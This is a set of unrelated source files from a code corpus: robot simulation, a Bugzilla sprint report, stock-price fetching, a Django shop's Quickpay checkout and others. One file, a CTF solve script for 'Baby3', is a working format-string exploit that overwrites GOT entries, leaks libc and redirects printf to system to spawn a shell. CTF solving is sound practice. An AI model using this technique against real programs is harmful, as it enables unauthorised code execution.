self._init_theta = orientation
# self.theta = 0 # initialized in reset
self.theta = orientation
self.radius = 11
self._food = False
#* Initialize sensors and actuators according to controller requirements
self.sensors = {k : s(self, **self.controller.enabled_sensors[k])\
for k, s in sensors.items()\
if k in self.controller.enabled_sensors.keys()}
self.actuators = {k : k == 'wheel_actuator' and a(self.radius, **self.controller.enabled_actuators[k])\
or a(**self.controller.enabled_actuators[k])\
for k, a in actuators.items()\
if k in self.controller.enabled_actuators.keys()}
#* Storage for actions selected by the controllers to be fed to actuators
self.planned_actions = {k : [None] for k in actuators.keys()}
#* Rendering colors (TO BE MOVED TO RENDER FILE IN THE FUTURE)
self.colorA = 'black'
self.colorB = 'black'
self.color2 = ('skyblue3', 'green')[self.trainable]
self.reset()
def step(self, neighborhood, reward=None, perturbations=None):
"""
Firstly steps all the sensors in order to perceive the environment.
Secondly, the robot executes its controller in order to compute the
actions based on the sensory information.
        Lastly, the actions are stored as planned actions to be eventually executed.
=====================
- Args:
neighborhood [list] -> list filled with the neighboring world objects.
reward [float] -> reward to be fed to the controller update rules, if any.
perturbations [list of PostProcessingPerturbation or None] -> perturbation to apply
to the stimuli before controller step.
- Returns:
State and action tuple of the current timestep. Both of them are expressed as
a dict with the sensor/actuator name and the corresponding stimuli/action.
=====================
"""
#* Sense environment surroundings.
state = self.perceive(neighborhood)
#* Apply perturbations to stimuli
for pert in perturbations:
state = pert(state, self)
#* Obtain actions using controller.
actions = self.controller.step(state, reward=reward)
#* Plan actions for future execution
self.plan_actions(actions)
# #* Handle robot food pickup
# if 'food_area_sensor' in state.keys() and bool(state['food_area_sensor'][0]):
# self.food = True
# if 'nest_sensor' in state.keys() and bool(state['nest_sensor'][0]):
# self.food = False
#* Render robot LED
self.update_colors(state, actions)
return state, actions
def update_colors(self, state, action):
colors = ['black', 'red', 'yellow', 'blue']
if 'wireless_transmitter' in self.actuators.keys():
for k, msg in enumerate(action['wireless_transmitter']['msg']):
symbol = np.argmin([np.abs(sym - msg) for sym in [0, 0.33, 0.66, 1]])
if k == 0:
self.colorA = colors[symbol]
if k == 1:
self.colorB = colors[symbol]
if 'led_actuator' in self.actuators.keys():
self.color2 = ('green', 'white', 'red')[action['led_actuator']] #[actions['wireless_transmitter']['state']]#
def plan_actions(self, actions):
for actuator, action in actions.items():
self.planned_actions[actuator] = (actuator == 'wheel_actuator')\
and [action, self.pos, self.theta] or [action]
def actuate(self):
"""
Executes the previously planned actions in order to be processed in the world.
=====================
- Args: None
- Returns: None
=====================
"""
for actuator_name, actuator in self.actuators.items():
# if actuator_name not in self.planned_actions:
# raise Exception('Error: Actuator does not have corresponding planned action.')
actuator.step(*iter(self.planned_actions[actuator_name]))
if 'wheel_actuator' in self.controller.enabled_actuators.keys() or 'target_pos_actuator' in self.controller.enabled_actuators.keys():
self._move(validated=True)
def perceive(self, neighborhood):
"""
        Computes the observed stimuli by stepping each of the active sensors.
=====================
- Args:
neighborhood [list] -> list filled with the neighboring world objects.
-Returns:
A dict with each sensor name as key and the sensor readings as value.
=====================
"""
return {sensor_name : sensor.step(neighborhood)\
for sensor_name, sensor in self.sensors.items()}
def _move(self, validated=False):
"""
        Applies the wheel actuator's planned displacement and rotation to the robot pose.
        =====================
- Args:
validated [bool] -> flag indicating if the planned movement is valid
(for example with no collisions).
- Returns: None
=====================
"""
self.pos += self.actuators['wheel_actuator'].delta_pos.astype(float) * float(validated)
self.theta += self.actuators['wheel_actuator'].delta_theta * float(validated)
# control angle range in (-pi,pi]
self.theta = self.theta % (2*np.pi) #(self.theta, self.theta + 2*np.pi)[self.theta < 0]
self.actuators['wheel_actuator'].delta_pos = np.zeros(2)
self.actuators['wheel_actuator'].delta_theta = 0.0
def reset(self):
"""
        Resets the robot dynamics, sensors, actuators and controller.
        =====================
        - Args: None
- Returns: None
=====================
"""
self.delta_pos = np.zeros(2)
self.delta_theta = 0.0
self._food = False
#* Reset Controller
if self.controller is not None:
self.controller.reset()
#* Reset Actuators
for actuator in self.actuators.values():
if hasattr(actuator, 'reset'):
actuator.reset()
#* Reset Sensors
for sensor in self.sensors.values():
if hasattr(sensor, 'reset'):
sensor.reset()
@property
def food(self):
"""Getter for the food attribute. It is a boolean attribute active if the robot stores food.
"""
return self._food
@food.setter
def food(self, hasfood):
"""Setter for the food attribute. It is a boolean attribute active if the robot stores food.
"""
self._food = hasfood
@property
def bounding_box(self):
return Point(self.pos[0], self.pos[1]).buffer(self.radius).boundary
def intersect(self, g):
inters = self.bounding_box.intersection(g)
if not inters: return []
if isinstance(inters, Point):
return np.array(inters.coords)
else:
return [np.array(v.coords[0]) for v in inters.geoms]
def initialize_render(self, canvas):
x, y = tuple(self.pos)
contour_id = canvas.create_oval(x-self.radius-2, y-self.radius-2,\
x + self.radius+2, y + self.radius+2, fill=self.color2)
# body_id = canvas.create_oval(x-self.radius, y-self.radius,\
# x + self.radius, y + self.radius, fill=self.color)
bodyA_id = canvas.create_arc(x-self.radius, y-self.radius,\
x + self.radius, y + self.radius, start=np.degrees(self.theta), extent=180, fill="black")
bodyB_id = canvas.create_arc(x-self.radius, y-self.radius,\
x + self.radius, y + self.radius, start=np.degrees(self.theta)+180, extent=180, fill="black")
orient_id = canvas.create_line(x, y,\
x + self.radius * 2 * np.cos(self.theta),\
y + self.radius * 2 * np.sin(self.theta),\
fill='black', width=2)
self.render_dict = {
'contour' : contour_id,
'bodyA' : bodyA_id,
'bodyB' : bodyB_id,
'orient' : orient_id,
}
return canvas
def render(self, canvas):
"""
Renders the robot in a 2D tkinter canvas.
"""
x, y = tuple(self.pos)
canvas.coords(self.render_dict['contour'],\
x-self.radius, y-self.radius,\
x + self.radius, y + self.radius)
canvas.coords(self.render_dict['bodyA'],\
x-self.radius+3, y-self.radius+3,\
x + self.radius-3, y + self.radius-3)
canvas.coords(self.render_dict['bodyB'],\
x-self.radius+3, y-self.radius+3,\
x + self.radius-3, y + self.radius-3)
canvas.itemconfig(self.render_dict['contour'], fill=self.color2)
canvas.itemconfig(self.render_dict['bodyA'], start=0, extent=180, fill=self.colorA)
canvas.itemconfig(self.render_dict['bodyB'], start=180, extent=180, fill=self.colorB)
canvas.coords(self.render_dict['orient'], x, y,\
x + self.radius * 2 * np.cos(self.theta),\
y + self.radius * 2 * np.sin(self.theta))
return canvas | 3.046875 | 3 |
util/flask_learn.py | yt7589/aqp | 0 | 12796791 | <filename>util/flask_learn.py
from flask import Flask
class FlaskLearn(object):
def __init__(self):
self.name = 'FlaskLearn'
def startup(self):
        print('Flask learning program')
def hello_world(self):
app = Flask('HelloWorld')
| 2.953125 | 3 |
scripts/sprint_report.py | AndrewDVXI/kitsune | 929 | 12796792 | <gh_stars>100-1000
#!/usr/bin/env python
import logging
import sys
import textwrap
import xmlrpc.client
USAGE = 'Usage: sprint_report.py <SPRINT>'
HEADER = 'sprint_report.py: your friendly report view of the sprint!'
# Note: Most of the bugzila api code comes from Scrumbugz.
cache = {}
log = logging.getLogger(__name__)
BZ_URL = 'http://bugzilla.mozilla.org/xmlrpc.cgi'
SESSION_COOKIES_CACHE_KEY = 'bugzilla-session-cookies'
BZ_RESOLUTIONS = ['', 'FIXED', 'INVALID', 'WONTFIX', 'DUPLICATE',
'WORKSFORME', 'DUPLICATE']
BZ_FIELDS = [
'id',
'status',
'resolution',
'summary',
'whiteboard',
'assigned_to',
'priority',
'severity',
'product',
'component',
'blocks',
'depends_on',
'creation_time',
'last_change_time',
'target_milestone',
]
UNWANTED_COMPONENT_FIELDS = [
'sort_key',
'is_active',
'default_qa_contact',
'default_assigned_to',
'description'
]
class SessionTransport(xmlrpc.client.SafeTransport):
"""
XML-RPC HTTPS transport that stores auth cookies in the cache.
"""
_session_cookies = None
@property
def session_cookies(self):
if self._session_cookies is None:
cookie = cache.get(SESSION_COOKIES_CACHE_KEY)
if cookie:
self._session_cookies = cookie
return self._session_cookies
def parse_response(self, response):
cookies = self.get_cookies(response)
if cookies:
self._session_cookies = cookies
                cache[SESSION_COOKIES_CACHE_KEY] = self._session_cookies
log.debug('Got cookie: %s', self._session_cookies)
return xmlrpc.client.Transport.parse_response(self, response)
def send_host(self, connection, host):
cookies = self.session_cookies
if cookies:
for cookie in cookies:
connection.putheader('Cookie', cookie)
log.debug('Sent cookie: %s', cookie)
return xmlrpc.client.Transport.send_host(self, connection, host)
def get_cookies(self, response):
cookie_headers = None
if hasattr(response, 'msg'):
            cookies = response.msg.get_all('set-cookie')
if cookies:
log.debug('Full cookies: %s', cookies)
cookie_headers = [c.split(';', 1)[0] for c in cookies]
return cookie_headers
class BugzillaAPI(xmlrpc.client.ServerProxy):
def get_bug_ids(self, **kwargs):
"""Return list of ids of bugs from a search."""
kwargs.update({
'include_fields': ['id'],
})
log.debug('Searching bugs with kwargs: %s', kwargs)
bugs = self.Bug.search(kwargs)
return [bug['id'] for bug in bugs.get('bugs', [])]
def get_bugs(self, **kwargs):
get_history = kwargs.pop('history', True)
get_comments = kwargs.pop('comments', True)
kwargs.update({
'include_fields': BZ_FIELDS,
})
if 'ids' in kwargs:
kwargs['permissive'] = True
log.debug('Getting bugs with kwargs: %s', kwargs)
bugs = self.Bug.get(kwargs)
else:
if 'whiteboard' not in kwargs:
kwargs['whiteboard'] = ['u=', 'c=', 'p=']
log.debug('Searching bugs with kwargs: %s', kwargs)
bugs = self.Bug.search(kwargs)
bug_ids = [bug['id'] for bug in bugs.get('bugs', [])]
if not bug_ids:
return bugs
# mix in history and comments
history = comments = {}
if get_history:
history = self.get_history(bug_ids)
if get_comments:
comments = self.get_comments(bug_ids)
for bug in bugs['bugs']:
bug['history'] = history.get(bug['id'], [])
bug['comments'] = comments.get(bug['id'], {}).get('comments', [])
bug['comments_count'] = len(comments.get(bug['id'], {})
.get('comments', []))
return bugs
def get_history(self, bug_ids):
log.debug('Getting history for bugs: %s', bug_ids)
try:
history = self.Bug.history({'ids': bug_ids}).get('bugs')
except xmlrpc.client.Fault:
log.exception('Problem getting history for bug ids: %s', bug_ids)
return {}
return dict((h['id'], h['history']) for h in history)
def get_comments(self, bug_ids):
log.debug('Getting comments for bugs: %s', bug_ids)
try:
comments = self.Bug.comments({
'ids': bug_ids,
'include_fields': ['id', 'creator', 'time', 'text'],
}).get('bugs')
except xmlrpc.client.Fault:
log.exception('Problem getting comments for bug ids: %s', bug_ids)
return {}
return dict((int(bid), cids) for bid, cids in comments.items())
def wrap(text, indent=' '):
text = text.split('\n\n')
text = [textwrap.fill(part, expand_tabs=True, initial_indent=indent,
subsequent_indent=indent)
for part in text]
return '\n\n'.join(text)
def sprint_stats(bugs):
"""Print bugs stats block."""
# Return dict of bugs stats
#
# * total points
# * breakdown of points by component
# * breakdown of points by focus
# * breakdown of points by priority
# * other things?
def parse_whiteboard(whiteboard):
bits = {
'u': '',
'c': '',
'p': '',
's': ''
}
for part in whiteboard.split(' '):
part = part.split('=')
if len(part) != 2:
continue
if part[0] in bits:
bits[part[0]] = part[1]
return bits
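# Illustrative example (whiteboard values are made up):
#
#   parse_whiteboard('u=dev c=search p=1 s=2012.19')
#   # -> {'u': 'dev', 'c': 'search', 'p': '1', 's': '2012.19'}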
def get_history(bugs, sprint):
history = []
for bug in bugs:
for item in bug.get('history', []):
for change in item.get('changes', []):
added = parse_whiteboard(change['added'])
removed = parse_whiteboard(change['removed'])
if ((change['field_name'] == 'status_whiteboard'
and removed['s'] != sprint
and added['s'] == sprint)):
history.append((
item['when'],
bug,
item['who'],
removed['s'],
added['s']
))
return history
def sprint_timeline(bugs, sprint):
"""Print timeline block."""
timeline = []
history = get_history(bugs, sprint)
# Try to associate the change that added the sprint to the
# whiteboard with a comment.
for when, bug, who, removed, added in history:
reason = 'NO COMMENT'
for comment in bug.get('comments', []):
if comment['time'] == when and comment['creator'] == who:
reason = comment['text']
break
timeline.append((
when,
bug['id'],
who,
removed,
added,
reason
))
timeline.sort(key=lambda item: item[0])
for mem in timeline:
print('%s: %s: %s' % (mem[0], mem[1], mem[2]))
print(' %s -> %s' % (mem[3] if mem[3] else 'unassigned', mem[4]))
print(wrap(mem[5]))
print('')
def print_header(text):
print(text)
print('=' * len(text))
print('')
def main(argv):
# logging.basicConfig(level=logging.DEBUG)
if not argv:
print(USAGE)
print('Error: Must specify the sprint to report on. e.g. 2012.19')
return 1
sprint = argv[0]
print(HEADER)
print('')
print('Working on %s' % sprint)
print('')
bugzilla = BugzillaAPI(
BZ_URL,
transport=SessionTransport(use_datetime=True),
allow_none=True)
bugs = bugzilla.get_bugs(
product=['support.mozilla.org'],
whiteboard=['s=' + sprint],
resolution=BZ_RESOLUTIONS,
history=True,
comments=True)
bugs = bugs['bugs']
print_header('Timeline')
sprint_timeline(bugs, sprint)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| 2.171875 | 2 |
flickpyper/pickles.py | theodysseus/flickpyper | 1 | 12796793 | <reponame>theodysseus/flickpyper<gh_stars>1-10
from os import path
import pickle
def get_ids(file):
if path.isfile(file):
with open(file, 'rb') as f:
return pickle.load(f)
else:
return []
def put_ids(file, ids):
with open(file, 'wb') as f:
pickle.dump(ids, f)
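if __name__ == '__main__':
    # Minimal round-trip sketch; the 'ids.pickle' file name is an arbitrary
    # example value.
    put_ids('ids.pickle', [1, 2, 3])
    assert get_ids('ids.pickle') == [1, 2, 3]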
| 2.640625 | 3 |
new_trade/main.py | cbbing/stock | 31 | 12796794 | #coding: utf-8
import tushare as ts
import pandas as pd
from util.date_convert import GetNowDate
def diagnosis_one_stock(code):
"""
    Diagnose an individual stock
:return:
"""
    # Get the stock price
df = get_stock_price(code, True)
    # Moving-average indicators
    # Candlestick (K-line) signals
def get_stock_price(code, include_realtime_price):
"""
    Get the price series for an individual stock
    :param code: stock code
    :param include_realtime_price: whether to include the real-time price
:return:
"""
    # Get historical prices
df = ts.get_hist_data(code)
df = df[['close']]
df['date'] = df.index
if include_realtime_price:
df_today = ts.get_today_all()
df_code = df_today[df_today['code']==code]
df_code = df_code[['trade']]
df_code['date'] = GetNowDate()
df_code.rename(columns={'trade': 'close'}, inplace=True)
df = pd.concat([df, df_code], ignore_index=True)
    df.sort_values(by='date', inplace=True)
df = df.drop_duplicates(['date'])
df.index = range(len(df))
    print('\n')
    # print(df.head())
    print(df.tail())
return df
if __name__ == "__main__":
get_stock_price('600000', True)
| 2.671875 | 3 |
tests/unit/test_fields/test_base.py | radeklat/sparkql | 0 | 12796795 | <reponame>radeklat/sparkql
import pytest
from sparkql.exceptions import FieldParentError, FieldNameError
from sparkql import Float, Struct
class TestBaseField:
@staticmethod
def should_give_correct_info_string():
# given
float_field = Float()
# when
info_str = float_field._info()
# then
assert (
info_str
== "<Float\n spark type = FloatType\n nullable = True\n name = None <- [None, None]\n parent = None\n>"
)
@staticmethod
def should_reject_setting_a_set_parent():
# given
struct = Struct()
float_field = Float()._replace_parent(struct)
another_struct = Struct()
# when, then
with pytest.raises(FieldParentError):
float_field._replace_parent(another_struct)
@staticmethod
def should_get_contextual_field_name():
# given
float_field = Float()
float_field._set_contextual_name("contextual_name")
# when
contextual_name = float_field._contextual_name
# then
assert contextual_name == "contextual_name"
@staticmethod
def should_reject_overriding_a_set_contextual_name():
# given
float_field = Float()
float_field._set_contextual_name("contextual_name")
# when, then
with pytest.raises(FieldNameError):
float_field._set_contextual_name("another_name")
@staticmethod
def test_field_name_should_raise_error_if_not_resolved():
# given
float_field = Float()
# when, then
with pytest.raises(FieldNameError):
float_field._field_name
@staticmethod
def test_should_reject_replacing_a_preexisting_explicit_name():
# given
float_field = Float(name="explicit_name")
        # when, then
with pytest.raises(FieldNameError):
float_field._replace_explicit_name("new_explicit_name")
| 2.34375 | 2 |
Gathered CTF writeups/ptr-yudai-writeups/2019/Security_Fest_2019/Baby3/solve.py | mihaid-b/CyberSakura | 1 | 12796796 | <reponame>mihaid-b/CyberSakura
from ptrlib import *
libc = ELF("./libc.so.6")
elf = ELF("./baby3")
sock = Process("./baby3")
delta = 0xe7
# Stage 1: exit-->_start
payload = fsb(
pos = 6,
writes = {elf.got("exit"): elf.symbol("_start") & 0xffff},
bs = 2,
size = 2,
bits = 64
)
print(payload)
sock.recvuntil("input: ")
sock.sendline(payload)
# Stage 2: leak libc base
sock.recvuntil("input: ")
sock.sendline("%25$p")
addr_libc_start_main = int(sock.recvline(), 16)
libc_base = addr_libc_start_main - libc.symbol("__libc_start_main") - delta
logger.info("libc base = " + hex(libc_base))
# Stage 3: printf-->system
payload = fsb(
pos = 6,
writes = {elf.got("printf"): libc_base + libc.symbol("system")},
bs = 2,
size = 8,
bits = 64
)
sock.recvuntil("input: ")
sock.sendline(payload)
# Stage 4: get the shell!
sock.sendline("/bin/sh\x00")
sock.interactive()
| 1.914063 | 2 |
vaultier/libs/version/context.py | dz0ny/Vaultier | 30 | 12796797 | <reponame>dz0ny/Vaultier
class Manager(object):
_user = None
_enabled = True
_user_required = True
def set_user_required(self, user_required):
self._user_required = user_required
def get_user_required(self):
return self._user_required
def set_user(self, user):
self._user = user
def get_user(self):
if self._user_required and (not self._user or
self._user.is_anonymous()):
msg = 'To store version valid user is required on ' \
'version_context_manager'
raise Exception(msg)
return self._user
def set_enabled(self, enabled):
self._enabled = enabled
def get_enabled(self):
return self._enabled
version_context_manager = Manager()
class VersionContextAwareApiViewMixin(object):
def initialize_request(self, request, *args, **kargs):
request = super(VersionContextAwareApiViewMixin, self) \
.initialize_request(request, *args, **kargs)
version_context_manager.set_user(request.user)
return request
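

# A minimal usage sketch (hypothetical helper, not part of the original module; a stand-in
# user object is used here instead of a real Django user):
def _example_version_context():
    class _StubUser(object):
        def is_anonymous(self):
            return False
    version_context_manager.set_user(_StubUser())
    if version_context_manager.get_enabled():
        return version_context_manager.get_user()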
| 2.4375 | 2 |
app/chat/migrations/0002_alter_chatmessage_user_id.py | GonnaFlyMethod/simple_chat | 0 | 12796798 | # Generated by Django 3.2.5 on 2021-07-20 13:39
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('chat', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='chatmessage',
name='user_id',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='sender'),
),
]
| 1.53125 | 2 |
SourceModel/SM_Constants.py | crossminer/CrossPuppeteer | 47 | 12796799 | CLASS_REGEX = r'class [\w\d\:\-_\']+(?:\:\:[\w\d\:\-_\']+)*\s*(?:\(.+\)\s*)*{*'
CLASS_NAME_REGEX = r'class ([\w\d\:\-_\']+(?:\:\:[\w\d\:\-_\']+)*)\s*(?:\(.+\)\s*)*{*'
DEFINE_REGEX = r'define \w+(?:\:\:\w+)*\s*(?:\(.+\)\s*)*{*'
FILE_REGEX = r'file\W*\{\W*\'.+\'\W*:|file\W*\{\W*\".+\"\W*:|file\W*{\W*\$.+\W*:'
PACKAGE_REGEX = r'package\W*\{\W*\'.+\'\W*:|package\W*\{\W*\".+\"\W*:|package\W*{\W*\$.+\W*:'
SERVICE_REGEX = r'service\W*\{\W*\'.+\'\W*:|service\W*\{\W*\".+\"\W*:|service\W*{\W*\$.+\W*:'
DECLARE_INCLUDE_REGEX = r'(?:^|\n)\s*(?:include|require|contain) (?:Class)*\[*(?:\$|\')*[\w\d\:\-_\']+(?:\:\:\${0,1}[\w\d\:\-_\']+)*\'*\]*(?:\s*,\s*(?:Class)*\[*(?:\$|\')*[\w\d\:\-_\']+(?:\:\:\${0,1}[\w\d\:\-_\']+)*\'*\]*)*'
#DECLARE_INCLUDE_REGEX = r'(?:^|\n)\s*(?:include|require|contain) (?:Class)?\[?((?:\'|\$)?[\w\d\:\-_]+(?:\:\:[\w\d\:\-_]+)*\'?)\]?(?:\s*,\s*(?:Class)?\[?((?:\'|\$)?[\w\d\:\-_]+(?:\:\:[\w\d\:\-_]+)*\'?)\]?)*'
#DECLARE_RESOURCE_REGEX = r'(?:^|\n)\s*class \{\s*(?:\'|\"|\$)?[\w\:\-_]+(?:\:\:\$?[\w\:\-_]+)*(?:\'|\")?\s*\:'
DECLARE_RESOURCE_REGEX = r'(?:^|\n)\s*class \{\s*(?:\'|\")?\:{0,2}(\$?[\w\d\:\-_]+(?:\:\:\$?[\w\d\:\-_]+)*)(?:\'|\")?\s*\:'
EXEC_REGEX = r'exec\W*\{\W*\'.+\'\W*:|exec\W*\{\W*\".+\"\W*:|exec\W*{\W*\$.+\W*:'
LOC_REGEX = r'\n'
IF_REGEX = r'if\W+.+\W*\{'
CASE_REGEX = r'case\W+.+\W*\{'
USER_REGEX = r'user\W*\{\W*.+:'
COMMENT_REGEX = r'\A#|\n#'
HARDCODED_VALUE_REGEX = r'= \d+|=> \d+|= .*\'.+?\s*(?:\(.+\)\s*)*\'|=> .*\'.+?\s*(?:\(.+\)\s*)*\'|' \
r'= .*\".+?\s*(?:\(.+\)\s*)*\"|=> .*\".+\s*(?:\(.+\)\s*)*\"'
NODE_REGEX = r'node\W*\w+(?:\:\:\w+)*\W+\{'
GLOBAL_VAR_REGEX = r'\$.+\W*='
CLASS_GROUP_REGEX = r'class (\w+(?:\:\:\w+)*)\s*(?:\(.+\)\s*)*{*'
CLASS_INH_REGEX = r'inherits (\w+(?:\:\:\w+)*){*'
FILE_GROUP_REGEX = r'file\W*\{\W*\'(.+)\'\W*:|file\W*\{\W*\"(.+)\"\W*:|file\W*{\W*(\$.+)\W*:'
PACKAGE_GROUP_REGEX = r'package\W*\{\W*\'(.+)\'\W*:|package\W*\{\W*\"(.+)\"\W*:|package\W*{\W*(\$.+)\W*:'
SERVICE_GROUP_REGEX = r'service\W*\{\W*\'(.+)\'\W*:|service\W*\{\W*\"(.+)\"\W*:|service\W*{\W*(\$.+)\W*:'
DEPENDENT_PACKAGE = r'Package\W*\[\'.+\'\]'
DEPENDENT_SERVICE = r'Service\W*\[\'.+\'\]'
DEPENDENT_FILE = r'File\W*\[\'.+\'\]'
DEPENDENT_CLASS = r'Class\W*\[\'.+\'\]'
DEPENDENT_GROUP_PACKAGE = r'Package\W*\[\'(.+)\'\]'
DEPENDENT_GROUP_SERVICE = r'Service\W*\[\'(.+)\'\]'
DEPENDENT_GROUP_FILE = r'File\W*\[\'(.+)\'\]'
DEPENDENT_GROUP_CLASS = r'Class\W*\[\'(.+)\'\]'
PACKAGE = "Package"
FILE = "File"
SERVICE = "Service"
CLASS = "Class"
VAR1_REGEX = r'\$\{.+\}'
VAR2_REGEX = r'\$.+\W*\{'
VAR3_REGEX = r'\'.+\''
VAR4_REGEX = r'\".+\"'
VAR1_EX_REGEX = r'\$\{(.+)\}'
VAR2_EX_REGEX = r'\$(.+)\W*\{'
VAR3_EX_REGEX = r'\'(.+)\''
VAR4_EX_REGEX = r'\"(.+)\"'
#class\W+.+\{|
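

# A minimal demo (not part of the original module; the one-line Puppet snippet is made up)
# showing how the class-name pattern above can be applied:
if __name__ == "__main__":
    import re
    print(re.findall(CLASS_NAME_REGEX, "class apache::params {"))  # -> ['apache::params']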
| 2.4375 | 2 |
views.py | jfroejk/cartridge_quickpay | 0 | 12796800 | <reponame>jfroejk/cartridge_quickpay<gh_stars>0
from django.http import HttpRequest, HttpResponse, HttpResponseRedirect, JsonResponse, \
HttpResponseBadRequest, HttpResponseForbidden
from django.template import loader
from django.template.response import TemplateResponse
from django.shortcuts import redirect, render
from django.utils.timezone import now
from django.views.decorators.csrf import csrf_exempt
from django.core.urlresolvers import reverse
from django.db import transaction
from mezzanine.conf import settings
from mezzanine.utils.importing import import_dotted_path
from cartridge.shop import checkout
from cartridge.shop.models import Order
from cartridge.shop.forms import OrderForm
import json
import logging
import re
from urllib.parse import urlencode
from typing import Callable, List, Optional
from .payment import get_quickpay_link, sign, sign_order, start_subscription, capture_subscription_order, \
acquirer_requires_popup, acquirer_supports_subscriptions, order_currency
from .models import QuickpayPayment, get_private_key
handler = lambda s: import_dotted_path(s) if s else lambda *args: None
billship_handler = handler(settings.SHOP_HANDLER_BILLING_SHIPPING)
tax_handler = handler(settings.SHOP_HANDLER_TAX)
order_handler = handler(settings.SHOP_HANDLER_ORDER)
order_form_class = (lambda s: import_dotted_path(s) if s else OrderForm)(getattr(settings, 'QUICKPAY_ORDER_FORM', None))
def quickpay_checkout(request: HttpRequest) -> HttpResponse:
"""Checkout using Quickpay payment form.
Use the normal cartridge.views.checkout_steps for GET and for the rest other payments steps,
use this special version for POSTing paument form for Quickpay.
Settings:
QUICKPAY_ORDER_FORM = dotted path to order form to use
QUICKPAY_FRAMED_MODE = <whether to use framed Quickpay>
QUICKPAY_SHOP_BASE_URL: str required = URL of the shop for success, cancel and callback URLs
QUICKPAY_ACQUIRER: str|list required = The acquirer(s) to use, e.g. 'clearhaus'
QUICKPAY_AUTO_CAPTURE: bool default False = Whether to auto-capture payment
urls.py setup:
from cartridge_quickpay.views import checkout_quickpay, order_form_class
...
url("^shop/checkout/", checkout_steps, {'form_class': order_form_class}),
url("^shop/checkout_quickpay/", checkout_quickpay, name="checkout_quickpay"),
url("^shop/", include("cartridge.shop.urls")),
...
** FOR FRAMED MODE: **
Change checkout.html
- <form ... onsubmit="return false">
- Change submit button to:
- <button class="btn btn-lg btn-primary pull-right" onclick="checkout_quickpay();">Go to payment</button>
- add payment modal
<div class="modal db-modal fade" id="payment_window" tabindex="-1" role="dialog" aria-labelledby="payment_window_label">
<div class="modal-dialog" role="document">
<div class="modal-content">
<div class="modal-body">
<iframe id="payment_iframe" style="width: 100%; border: none; height: 90vh;"></iframe>
</div>
</div>
</div>
</div>
- and add JS at the bottom:
<script>
function checkout_quickpay() {
$.post("{% url 'quickpay_checkout' %}", $('.checkout-form').serialize(), function(data) {
if (data.success) {
$('#payment_iframe').attr('src', data.payment_link);
$('#payment_window').modal('show');
} else {
alert("failed");
}
});
}
</script>
"""
framed: bool = getattr(settings, 'QUICKPAY_FRAMED_MODE', False)
acquirer = request.POST.get('acquirer', None)
logging.debug("quickpay_checkout: using acquirer {}".format(acquirer or '<any>'))
in_popup = acquirer_requires_popup(acquirer)
step = checkout.CHECKOUT_STEP_FIRST # Was: _LAST
checkout_errors = []
initial = checkout.initial_order_data(request, order_form_class)
logging.debug("quickpay_checkout: initial order data = {}".format(initial))
form = order_form_class(request, step, initial=initial, data=request.POST)
if form.is_valid():
logging.debug("quickpay_checkout() - Form valid")
request.session["order"] = dict(form.cleaned_data)
try:
billship_handler(request, form)
tax_handler(request, form)
except checkout.CheckoutError as e:
logging.warn("quickpay_checkout() - billship or tax handler failed")
checkout_errors.append(e)
# Create order and Quickpay payment, redirect to Quickpay/Mobilepay form
order = form.save(commit=False)
order.setup(request) # Order is saved here so it gets an ID
# Handle subscription or one-time order
if (hasattr(order, 'has_subscription')
and order.has_subscription()
and acquirer_supports_subscriptions(acquirer)):
quickpay_subs_id, quickpay_link = start_subscription(
order, order.items.all().order_by('id')[0])
logging.debug("quickpay_checkout() - starting subscription {}, payment link {}"
.format(quickpay_subs_id, quickpay_link))
else:
# One-time order OR subscription with acquirer that doesn't support subscriptions
quickpay_link: str = get_quickpay_link(order, acquirer)['url']
logging.debug("quickpay_checkout() - product purchase (or subscription w/o auto-renewal), payment link {}"
.format(quickpay_link))
# Redirect to Quickpay
if framed:
logging.debug("quickpay_checkout() - JSON response {}"
.format(str({'success': True, 'payment_link': quickpay_link})))
return JsonResponse({'success': True, 'payment_link': quickpay_link})
        # Pass along whether the URL should open in a new window, open it in JS, and handle the return page ending up in the iframe again
elif in_popup:
logging.debug("quickpay_checkout() - Opening popup window")
return render(request, "cartridge_quickpay/payment_toplevel.html", {'quickpay_link': quickpay_link})
else:
logging.debug("quickpay_checkout() - Redirect response")
return HttpResponseRedirect(redirect_to=quickpay_link)
# Form invalid, go back to checkout step
step_vars = checkout.CHECKOUT_STEPS[step - 1]
template = "shop/%s.html" % step_vars["template"]
context = {"CHECKOUT_STEP_FIRST": step == checkout.CHECKOUT_STEP_FIRST,
"CHECKOUT_STEP_LAST": step == checkout.CHECKOUT_STEP_LAST,
"CHECKOUT_STEP_PAYMENT": (settings.SHOP_PAYMENT_STEP_ENABLED and
step == checkout.CHECKOUT_STEP_PAYMENT),
"step_title": step_vars["title"], "step_url": step_vars["url"],
"steps": checkout.CHECKOUT_STEPS, "step": step, "form": form,
"payment_url": "https://payment.quickpay.net/d7ad25ea15154ef4bdffb5bf78f623fc"}
page = loader.get_template(template).render(context=context, request=request)
if framed:
logging.debug("quickpay_checkout() - Form not OK, JSON response")
return JsonResponse({'success': False, 'page': page})
else:
logging.debug("quickpay_checkout() - Form not OK, page response")
return HttpResponse(page)
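

# A minimal settings sketch for the options read by quickpay_checkout above; the values are
# hypothetical examples, not taken from a real deployment:
#
#   QUICKPAY_ORDER_FORM = "myshop.forms.MyOrderForm"
#   QUICKPAY_FRAMED_MODE = False
#   QUICKPAY_SHOP_BASE_URL = "https://shop.example.com"
#   QUICKPAY_ACQUIRER = "clearhaus"
#   QUICKPAY_AUTO_CAPTURE = False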
def escape_frame(f: Callable[[HttpRequest], HttpResponse]) -> Callable[[HttpRequest], HttpResponse]:
"""Escape iframe when payment is in a iframe and the shop itself is not"""
def f_escape(request: HttpRequest) -> HttpResponse:
if request.GET.get('framed'):
logging.debug("cartridge_quickpay.views.escape_frame: Escaping")
url = request.path
get_args = request.GET.copy()
get_args.pop('framed')
if get_args:
url += '?' + get_args.urlencode()
res = '<html><head><script>window.parent.location.replace("{}");</script></head></html>'.format(url)
return HttpResponse(res)
else:
logging.debug("cartridge_quickpay.views.escape_frame: NOT in frame")
return f(request)
f_escape.__name__ = f.__name__
return f_escape
def escape_popup(f: Callable[[HttpRequest], HttpResponse]) -> Callable[[HttpRequest], HttpResponse]:
"""Escape payment popup window"""
